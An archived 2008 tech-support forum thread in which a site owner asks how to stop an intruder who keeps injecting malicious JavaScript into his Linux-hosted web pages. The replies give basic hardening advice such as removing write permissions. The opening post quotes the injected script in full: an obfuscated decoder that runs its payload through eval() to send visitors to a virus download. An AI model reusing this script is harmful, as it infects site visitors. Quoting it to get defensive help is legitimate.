Solved

Virus on My websites

Posted on 2008-10-12
8
297 Views
Last Modified: 2013-11-22
Someone hacks into my html and php server and he adds this piece of javascript code that it redirects you to a website that downloads virus

<script language=JavaScript>function pbn15(p) {var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,24,6,16,62,13,7,17,31,21,0,0,0,0,0,0,40,9,12,1,32,22,5,47,26,38,3,43,28,49,61,57,29,41,19,59,48,11,23,25,51,42,39,0,0,0,0,8,0,14,4,50,53,0,46,45,52,10,18,56,44,30,27,55,54,58,36,37,34,60,33,35,15,2,20);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(253^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}pbn15('ijOrWiQtRS1tLI_taylpOiOr1YgMWiQZ_yAIRIkhi4_sAtWdH6Bsn4_Z3tWoRcAr1yBc_wuXioLoa4@Ze0PsAI1w6UghLIWI3SQrRI_IRI_h82QrmHOhRtWtjZ@hyKgdTcWt9aNwjtkrWE5lLI1sR0_ZRIQr3E5dVSuXb0Bczngp_wBcxKLXHngp8ogtzIWt9yLcaRLo9tAsHEWteKBcPS1tb2AIe0PIzq1w7cAv6xQrRtOoJ6lhzfOwLyAIJK5d')</script><!-- 64.202.163.152 -->

How can i protect my site and how can i track him down ? He has done a lot of damage on our reputation and our clients..

Please help.

0
Comment
Question by:cscg1976
8 Comments
 
LVL 7

Expert Comment

by:myhc
ID: 22700977
Do you have IIS logging setup on your IIS?
0
 
LVL 7

Expert Comment

by:myhc
ID: 22700985
What fire do you have protecting your IIS server, Does that have logging enabled?
0
 

Author Comment

by:cscg1976
ID: 22701315
It's a Linux box. I don't know what is hapenning.
0
Are your AD admin tools letting you down?

Managing Active Directory can get complicated.  Often, the native tools for managing AD are just not up to the task.  The largest Active Directory installations in the world have relied on one tool to manage their day-to-day administration tasks: Hyena. Start your trial today.

 
LVL 7

Expert Comment

by:myhc
ID: 22701360
Please provide Linux details : Model and versions.
Is the firewall part of the box or do you have a hardware firewall?
0
 
LVL 12

Expert Comment

by:lunadl
ID: 22702477
Ping your server to see if it was a DNS attack in stead of a data one. Do you know that he gained access to your machine. Ping from proxies to make sure you are hitting from multiple locations.
0
 

Author Comment

by:cscg1976
ID: 22702796
How can i ping from proxies?
0
 
LVL 20

Accepted Solution

by:
Daniel McAllister earned 500 total points
ID: 22953303
This question SHOULD have been posted to a Linux zone...

The reason you're getting hacked is that your system is likely vulnerable to breakin from a user account with an easy-to-guess username/password combination (like username dan, password dan; or username dan, password password)

If you're getting hacked, then they're logging in as a USER and that USER is modifying your web site contents. The file is successfully modified because WRITE permission exists on the file.

As a FIRST step, set the permissions to "no-write" for all of your website
From a command prompt, probably with root permissions, execute
chmod ugo-w /var/www/html

If you STILL get hacked, then either your ROOT user password is known (or easy to guess), or the "culprit" is the owner of one of those files/folders.

What I've provided here are just rudimentary steps. It's possible, but unlikely, that you've got vulnerabilities in your apache web server, ssh server, or any of the other services you've got turned on. If you're a novice admin, you're probably also logging in directly as root (a VERY bad idea).

Suffice it to say, if you're NEW to Linux Admin and this is a "professional" server (business website(s), email, etc.), then you may want to look into paying a professional to "lock it down" for you.

Good Luck!

Dan
IT4SOHO
0
 
LVL 23

Expert Comment

by:Tiggerito
ID: 23103334
I just found this article that also points to access via a user account

http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
0

Featured Post

3 Use Cases for Connected Systems

Our Dev teams are like yours. They’re continually cranking out code for new features/bugs fixes, testing, deploying, testing some more, responding to production monitoring events and more. It’s complex. So, we thought you’d like to see what’s working for us.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This story has been written with permission from the scammed victim, a valued client of mine – identity protected by request.
International Data Corporation (IDC) prognosticates that before the current the year gets over disbursing on IT framework products to be sent in cloud environs will be $37.1B.
Use Wufoo, an online form creation tool, to make powerful forms. Learn how to choose which pages of your form are visible to your users based on their inputs. The page rules feature provides you with an opportunity to create if:then statements for y…
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…

770 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question